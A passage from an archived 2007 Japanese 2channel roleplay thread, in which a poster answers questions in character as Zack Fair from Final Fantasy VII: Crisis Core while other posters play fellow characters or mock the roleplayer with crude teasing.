そうだね。ってのは冗談で、いつからあんたと俺がおホモだちになったんだよ?
それに、みんなに勘違いされたらどうするんだよ?
俺だって女の子の方が好きだっての!

あんたと友達になるっていうなら何にも問題はないけど、
変な気はおこすなよ?

>>175
アンジールとクラウドのどっちが美味しかったって?
クラウドの方が…なんて俺が言うと思ってるのかぁ!?
それに俺が食べたことがあるような言いっぷりじゃないか!

それより、どっちがっていうよりも、
美味しかった?ってのがよくわからない。
人を食べるだなんて有り得ないし…
どっちにしろ食べてないから
おいしいとか不味いとか答えようがないじゃないかよ!

193 :ザックス ◆fZJjtbCv9E :2007/11/27(火) 23:00:54
>>176
セフィロス、来てくれてうれしいよ。
けど、今までいったいドコに行ってたんだ?
みんな探してたぞ。

それより結婚してくれってどういうことだよ?
俺もあんたも男じゃないか!
それにセフィロスにはファンがいっぱいいるのに
何で俺なんだよ?
ちょっと見ないうちに性格が変わって
冗談の一つも言うようになったんだな!
その方がもっと気楽に話せるような気がするよ。
けど、俺はセフィロスに負けない英雄になるってコトを忘れるなよ!

>>177
意識が薄れてって、おい!あんた大丈夫か?
こんなトコで倒れられても何も出来ないけど、
とりあえず介抱しなくちゃな。
それより意識が薄れてくだなんて、
あんたに一体何があったんだ?

194 :ザックス ◆fZJjtbCv9E :2007/11/27(火) 23:02:28
>>178
クラウド、よく来てくれてうれしいよ。
最近、調子はどうだ?
俺は元気に訓練、任務を頑張ってるよ。

けど、急に友達やめただなんて、
何か俺が気にさわるようなコトでもしたかな?
そうだったらゴメン
これからもクラウドとは一緒にソルジャーとして成長していきたいし
楽しい時間も過ごしていきたいって思ってる。
それに、ご飯食べに行く約束してたよな?
友達やめただなんて言われても
それでも俺はクラウドを親友だと思ってるよ。

>>179
そうだなぁ。ペットを飼うなら犬か猫かな?
犬は一緒に遊べるし、かまってほしくて来てくれるだろ?
それに一緒に走り回れるし。
猫だったら、ヒザの上にちょこんと乗っかってくれて、なでなでしていたいってのが俺の願望かな?

家を空けることが多いから、ペットは実際の所、飼えないけど
いてくれたら、すごい癒しになるんだろうなぁって思うよ!
それに、あんたも犬好きだなんて気が合うな!

195 :ザックス ◆fZJjtbCv9E :2007/11/27(火) 23:04:32
>>180
神羅カンパニーの正社員になりたいのか?

難しいかは俺には人事のコトとかわからないけど、
一度受けてみたらどうだ?物は試しっていうだろ?

まぁ神羅は巨大な会社で社員もたくさんいるけど
社員を取る数も少なくはないと思うし。

それよりあんたも一緒にソルジャーをやらないか?
仲間が増えるのはうれしいコトだからな。

>>181
カンセルを掘ったってどういう意味だよ?

俺はソルジャーで炭鉱夫ではないから掘ったりはしないよ。
ってか、変な意味じゃないよな?
おれには変な趣味なんてないんだからな!
それにどこからの情報だよ?
あんまりあんたが変なコトを言うと俺が変な目で見られるだろ?

196 :ザックス ◆fZJjtbCv9E :2007/11/27(火) 23:06:16
>>182
もう出てこないでねってどういう意味だよ?

俺は戦う時は一番前に出て戦うのをモットーとしてるし、
これからもそうするつもりだよ。
それに怯んで後ろの方に隠れてるだなんて
かっこ悪いだろ?

まずは真っ先に出ていってモンスターを倒す
それが俺のやり方だよ。

>>183
2週目クリアしただなんて、すごいな。
それより歯の数を数えてみたら
28本だったよ!
これって何か意味があるのか?
俺には虫歯がないから歯医者にいったことがないけど
聞いたところによると、虫歯があると
噛んだ時に歯をくいしばれないから
力がでにくくなるらしいよ。
だから虫歯があったら、すぐに直した方がいいんだって聞いたことがあるよ。

197 :ザックス ◆fZJjtbCv9E :2007/11/27(火) 23:07:45
>>184
俺にはあんたがいってるような彼女がいないんだけどな。
それにたくさんだなんて…
けど消されたってどういうことだ?
俺の前からは誰一人いなくなってなんかいないよ。
これからも仲間は俺が守っていくつもりだし、
もうアンジールように俺の前から誰もいなくなってほしくないから。

>>185
おはよーってか、もうこんばんはだな。
遅くなってゴメンな!

あんたの言うとおりで、俺は寝起きが悪いってことがなく、
結構スッキリ起きられるかな。
普通に携帯の音ですぐに起きれるし、
何時でも起きるのは大丈夫だよ。

低血圧だと、朝起きるのが大変なのか?
俺は朝御飯もしっかり食べるし、
俺の元気をわけてあげたいくらい、朝からでも動き回れるよ!

それより、おはよーとか、おやすみとか言われると
なんだかうれしい気持になるよ!

198 :ザックス ◆fZJjtbCv9E :2007/11/27(火) 23:09:38
>>186
エアリス、途中で話をやめられたらすごく気になるだろ?
しかも、まさかザックス、クラウドと、だなんて、余計に気になるじゃないか。

俺とクラウドはソルジャーとしていろんなトコに行って任務をこなしたり、
話をしたりしてる親友だよ。

それより、今度クラウドも誘って一緒に花売りができたらいいよな。
それに、みんなで花売りした方が楽しいだろ?
今度クラウドにも話をしてみるから、
待っててくれよな!

>>187
ラブレターなんて、初めてもらったよ。
なんだかちょっと照れくさいいなぁ。
でも、ありがとう。すごくうれしいよ!
それに花柄だなんて、すごくかわいらしいな。

ラブレターすごくうれしかっし
あんたからの気持がこもってる手紙だから
ちゃあんと、しまっておくよ!

199 :以上、自作自演でした。:2007/11/27(火) 23:10:05
や、きもいから

200 :ユフィ:2007/11/27(火) 23:18:47
しゅしゅしゅ!!!

びびったか?

201 :ティファ:2007/11/28(水) 03:36:56
ザックスなんて大嫌い!
クラウドの方がずっと強いし頼りになるもんね。

202 :以上、自作自演でした。:2007/11/28(水) 03:43:04
本物のザックスはむさ苦しい臭そうな男だったよね

203 :以上、自作自演でした。:2007/11/28(水) 10:51:22
腐女子が喜ぶレスいっぱい

言いかけた後で、取り繕ったように長々否定してるのカワユス

204 :以上、自作自演でした。:2007/11/28(水) 17:16:55
また出たのかよ
消えればいいのに

205 :ザックス ◆fZJjtbCv9E :2007/11/29(木) 22:20:51
>>199
あんたって人は、はっきり言うん人なんだな。

まぁ、今はあんたにとって俺はきもいかもしれないけど
今に俺だって男らしくて強い男になってみせるよ。
そうなったら、あんたにきもいだなんて言わせないからな!
けど、はっきりきもいって言われた方がスッキリりするし
一つの意見として受けとめるよ。
それにきもいだなんて思われない男になるって誓うよ!

>>200
うわぁっ!!
後ろから来るなんて、ビックリしただろうがぁ!
それに、気配がなく近付いてくるだなんて
さすがユフィだな。
けど、やっぱりしゅしゅしゅってやっても
俺にはあたらないみたいだな。

まぁユフィもふざけてやってるんだろうけど。
たまには普通に来てくれよな!
それに、また来てくれるのを俺は待ってるし、
ユフィにはすごく元気を貰ってる気がするよ!
だから、来てくれてありがとうな!

206 :ザックス ◆fZJjtbCv9E :2007/11/29(木) 22:22:11
>>201
ティファ、久しぶりだな。
元気にしてたか?

ティファとクラウドは子供の頃からの親友だろ?

それよりクラウドもソルジャーとして強い男に成長してると俺も思うよ!

俺がこの目で見てきてるし、日々の訓練にも耐えて
どんどん強くなっていってる。
俺もクラウドに負けないくらい、これからも頑張るつもりだ。

だから、ティファのコトはクラウドにまかせるよ。

>>202
本物のザックスって、俺は、俺だろ?
それに、あんたにとって俺のイメージがそうなのか?
むさ苦しい臭い男だなんて、けなされてるのか、誉められてるのかわからないじゃないか!

それに、俺はまだまだ仔犬のザックスだなんて言われてるけど、
これからもソルジャーとして成長していきたいって思ってる。
それと、俺としては前向きな考えを持ち、
夢を忘れず、何事にも動じない強い男になるってコトを心にしまって
これからもがんばっていくよ!

207 :ザックス ◆fZJjtbCv9E :2007/11/29(木) 22:23:46
>>203
内容によると思うけど、否定するところは否定しておかないと
そうだと思われるだろ?
それに言いたいこと、話したいことがいっぱいあるから
長くなるんだよな…

それより、カワユスだなんて恥ずかしいだろ?
あんたから見ても、男として俺はやっぱりまだまだってことなのか…
けど、あんたには俺が男として成長していく姿を
これからも見ていてほしいな!

>>204
消えればいいのにか…
俺はまだココから消えるわけにはいかない。
まだまだ先は長いけど、俺は俺なりにココを守るよ!

それに、来てくれる人がいる限り俺は返事をしていくつもりだし、
どんなコトを言われてもココに来てくれる人には感謝してるんだ。

それと、せっかく来てくれた人がいるのに返事をしないなんて失礼だと思うしな。

それをあんたにもわかってもらえるとうれしいんだけど…
それに、何を言われようと、俺は後ろを向かず、前に突き進んでいくよ。

208 :以上、自作自演でした。:2007/11/30(金) 01:54:03
つ ザックラ同人誌

209 :以上、自作自演でした。:2007/11/30(金) 02:40:30
中のやつ腐女子だろ
失せろ

210 :ティファ23才:2007/11/30(金) 03:34:38
>>206
子供の頃クラウドとはそんなに仲良しじゃなかったのよ。今は一緒に暮らしてるんだけどね。
それとクラウドはソルジャーにはなれなかったはずよ?それはあなたも知っているでしょう?
ニブルヘイムの事件の時にはひどい事言ってしまって…。今はとても反省してるわ。ごめんなさい。



だからはやく成仏して

211 :以上、自作自演でした。:2007/11/30(金) 09:04:36
>>209
同感
何が子犬だよ、きもすぎる

212 :以上、自作自演でした。:2007/11/30(金) 11:00:42
腐女子死ね

213 :セフィロス:2007/12/01(土) 02:15:22
頑張れよ、ザックス。

つ イカ

214 :以上、自作自演でした。:2007/12/01(土) 05:23:53
ここのなりきりCCしかやってないんじゃないか?
肝心なところ無知なんだよなww
新規のザックス腐女子と見た

215 :以上、自作自演でした。:2007/12/01(土) 10:00:54
はよ。眠いぞ、と。
土曜なのに本社ビルで待機中だ。
退屈だぞ、と。

216 :以上、自作自演でした。:2007/12/01(土) 12:28:30
待っててやるぞ、と

217 :ユフィ:2007/12/01(土) 16:12:09
ザックス〜!これにサインして!
 ┌─―─―――――┐
 │   契約書1  
 | このスレが無 
 | 事に完走した 
 | ら、マテリア 
 | は全てユフィ 
 | ちゃんの物と   
 | する!    
 └――――――――┘

218 :以上、自作自演でした。:2007/12/01(土) 18:45:28
ひでぇ契約書w

質問はあるのか?ないんだけど、時間があるとここに来てしまう。
なんとかならないか?

219 :以上、自作自演でした。:2007/12/02(日) 22:29:11
携帯料金は月いくらくらいなんですか?

220 :ザックス ◆fZJjtbCv9E :2007/12/02(日) 22:55:31
>>208
俺にはそんな趣味はないっての!
これって、ザックス、クラウドってことだよな?
ってか、ザックラってかなり略しすぎだろ?
最初は何だかわからなかったぞ!

それと、クラウドは俺にとって親友だっていうコトだけはこれまでも、これからも変わらないよ。

>>209
残念だけど俺は腐ってもいないし、女子ではないよ。それに中の奴って誰だよ?

たしかに、強気すぎる口調ではなく、ココではやんわりにはしてたけど
なんて、のんびり言ってる場合じゃないみたいだな…
勘違いされるのは困るけど、俺の言動でこういうコトになっているのは
俺に責任があると思う。
けど、失せろとあんたに言われようが、それでも俺はココを守るよ!
それに俺は女子じゃなく男だっての!

221 :ザックス ◆fZJjtbCv9E :2007/12/02(日) 22:57:02
>>210
だから、俺は男だっての!それに、俺は自分が子犬だなんて一言も言ってないぞ!
ただ、アンジールやジェネシス、それにココの人達に言われてただけだよ。
そこは勘違いしてほしくないな。
俺だってソルジャーとしていろんな経験を積んできたんだ。
それをずっと子犬のザックスだなんて言わせないからな。
まだまだ俺にも足りない部分は沢山あるけど
これからも男として成長していく為に、
俺は何があっても、頑張ることだけは忘れないよ!

>>211
ティファ、また来てくれたのか。

クラウドとテイファは子供の頃からの知り合いだとは聞いてたが
一緒に暮らしてるのは初耳だな。

それに、ニブルヘイムでのことは俺は全く気にしてないよ。
俺にもティファを守れなかったっていうことだけが、
ずっとがひっかかっていたんだ。
だからゴメンって言わなければならないのは俺の方だよ。

それより、成仏してだなんて、俺はまだ死んでないっての!
だからココにいるんだろ?
それに、これからも俺はソルジャーとして頑張っていくつもりだよ!

222 :ザックス ◆fZJjtbCv9E :2007/12/02(日) 22:58:15
>>212
だから、俺は女子じゃないっての!
それに、死ねと言われて死ぬ馬鹿はいないだろ?

これからまだ俺にはやらなければならないことがたくさんあるし、
夢を諦めるわけにはいかないから
あんたに死ねと言われようが、俺は強く生きていくよ!
これまでも頑張ってきたんだから
これからも最後まで頑張りぬくよ!

>>213
英雄セフィロスに、頑張れだなんて応援されるとは思ってもみなかったよ。
ありがとう。すごくうれしいよ!

それより、俺にイカをくれるのか?
ってか、なんで急にイカなんだよ?
しかも生物だから早く食わないと腐るじゃないか!
まぁ、腹が減ってるからありがたくいただいとくよ!
イカの意味はわからないけど、何かのネタか?

223 :ザックス ◆fZJjtbCv9E :2007/12/02(日) 22:59:46
>>214
肝心なところが無知で悪かったな!と、言いたい所だけど
俺には勉強不足なコトが多いから、
あんたみたいに、はっきり言ってくれる人が俺には必要なんだよな。

それより、俺のことを腐女子と見た、だなんて、はっきり言ってるけど間違いだっての!
どっからどう見ても俺は男だろ?
まだまだ俺には足りない部分、出来てない所は多いが、これからはもっと勉強して、あんたに無知だなんて言わせないからな!

>>215
はよ!って言っても、また夜になっちまったな。
ってコトでこんばんは!

それより、遅くなったけど、休日なのに仕事お疲れ様!

待機してたってことは、ずっと座って待ってたってコトか?
俺にはじっとしてるコトが出来ないから、
あんたと同じく待機してるだけだなんて、俺もきっと退屈になるだろうな。
けど、そんな時こそスクワットして俺は時間をつぶすよ!

それより、あまりにも口調がレノにそっくりだから
レノかと思ったじゃないかよ!
あんたのモノマネは完璧だな!

224 :ザックス ◆fZJjtbCv9E :2007/12/02(日) 23:01:09
>>216
最近はレノのモノマネが流行ってるのか?
そういえば、前に俺もココで一度だけレノのマネしてみたけど。

それより待っててやるぞ、と、の一言が
俺にはすごくうれしかったよ!
それから、ありがとう!

あんたのお陰で、俺も更に頑張ろうって思えたよ。

これからも俺はココで頑張っていくから、また、来てくれよな!

>>217
ユフィ、いつも元気をわけてくれてありがとな!
ここの所ユフィには助けられてる気がするよ!

それより、そのうさんくさい契約書はなんだよ?
それに、1があるってコトは2や3があるんじゃないのか?
ってか、ちゃっかりしてるのは相変わらずだな!
まぁユフィには助けられてるお礼として、書いてやってもいいけど、
ココが完走したら、だなんてまだまだ先だぞ?
それじゃあ俺からの最初で最後のプレゼントとして、名前を書くか…

って思ったら、サインするスペースがないんで、また今度ってトコだな!

225 :ザックス ◆fZJjtbCv9E :2007/12/02(日) 23:02:22
>>218
そっか。ヒマなときにココを見てくれてるだなんて、ありがとうな!
それだけでも俺はうれしいよ!
ココはのんびりやっていきたいから
あんたがココに来てくれて、少しでものんびりした気分になってくれたら、俺もうれしいし、
それに、質問じゃなくても、気軽に話しかけてくれればいいよ。
来たときは、何でもいいから
何か書き置きでも残しておいてくれよな!
また、あんたが来てくれるのを俺は待ってるからさっ!

>>219
携帯は会社から支給されてるから
料金は俺が払ってるわけじゃないんだ。
だから、はっきりした料金はわからないんだよ。
だいたい連絡を取り合ってるのは
仕事のことばかりだし。
それに、俺からメールや電話するより、実際のところ連絡が来る方が多いから
そんなに料金はかかってないと思うよ。
それと、俺の場合、メールよりも電話、電話よりも逢って話す方がいいと思ってるんだ。

226 :以上、自作自演でした。:2007/12/02(日) 23:14:22
新規がなりきりすんなよw

227 :以上、自作自演でした。:2007/12/03(月) 00:21:25
また来てみた。

ないっての!ってよく使ってるな。
語尾がいつも強調されてる
なんかなんかなんか

228 :以上、自作自演でした。:2007/12/03(月) 11:55:30
本編知らないでやってるなら気持ち悪いから

229 :以上、自作自演でした。:2007/12/03(月) 14:06:57
アンジールではなくクマジールだろう?

230 :以上、自作自演でした。:2007/12/03(月) 16:58:43
俺は夢も誇りも無くしてしまった…

231 :以上、自作自演でした。:2007/12/03(月) 17:27:08
>>230
ザックス乙

232 :以上、自作自演でした。:2007/12/03(月) 17:53:31
このザックスすごく面白いし萌えるし似てるし最高だよ
荒らしが渦巻く厨ジャンルに現れた一筋の光だな

233 :以上、自作自演でした。:2007/12/03(月) 18:38:29
>>232
自演かww

234 :以上、自作自演でした。:2007/12/03(月) 21:04:52
FF関係のスレはみんな荒れるね。なんでだろ?

235 :以上、自作自演でした。:2007/12/03(月) 21:42:49
クラウドはソルジャーにはなれなかったはずよ?それはあなたも知っているでしょう?

ここの部分にちゃんと答えてくれませんか
なぜクラウドがソルジャーになったと思い込んでるの

236 :以上、自作自演でした。:2007/12/03(月) 22:17:13
いや、ここまだ全然マシな方だよ。
エアリスやティファのスレなんか過去酷かった。クラウドも。
まぁ、名無しもコテも荒らしにいちいち感情的になってちゃいかん。
今やってるみたいに軽く流せば良い。
根性見せて最後まで頑張れや

237 :エアリス:2007/12/03(月) 22:34:18
今のままでもいいけれど…結婚、したいな。
ねぇ、ザックスは子供好き?

238 :シスネ:2007/12/04(火) 00:40:49
ザックス…赤ちゃんできちゃった
きっとコスタの時の子よ

239 :クラウド:2007/12/04(火) 01:20:07
ここまでいけたんだ、ザックスならやれる。頑張れ!



イテテっ、ケツが痛いな・・・

240 :以上、自作自演でした。:2007/12/04(火) 01:27:19
エアリスかわいい

241 :以上、自作自演でした。:2007/12/04(火) 02:07:00
アンジールも孕ませたってね

242 :以上、自作自演でした。:2007/12/04(火) 19:46:31
ザックスのことが本当に大好きなんです。女の子が大好きなのもたくさん彼女がいるのも知ってます。
セフレでも良いので傍にいさせて下さい

243 :以上、自作自演でした。:2007/12/04(火) 21:18:16
俺も俺も
俺もセフレでもいいから連れて行ってくれ

244 :以上、自作自演でした。:2007/12/05(水) 00:04:56
まあひとまず落ち着きませんか。
かいておくけど
なりきりですから(´・ω・`)
別にちゃんとなんなくてもしょうがないと思うよ。

と夢のない中学生の娘が言ってます

245 :以上、自作自演でした。:2007/12/05(水) 05:40:23
本編知らない新規のなりきりw

246 :以上、自作自演でした。:2007/12/05(水) 13:39:02
>>242
本編エアリス乙

247 :ヴィンセント :2007/12/06(木) 02:11:49
私を慰めてくれないか…




248 :以上、自作自演でした。:2007/12/06(木) 10:45:38
クリスマスの予定は?
誰とどこでどう過ごすんだ?
その人に贈るプレゼントは何?予算は?衣装は?
寒いから風邪引くなよ。

249 :以上、自作自演でした。:2007/12/06(木) 15:08:12
人殺し

94 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)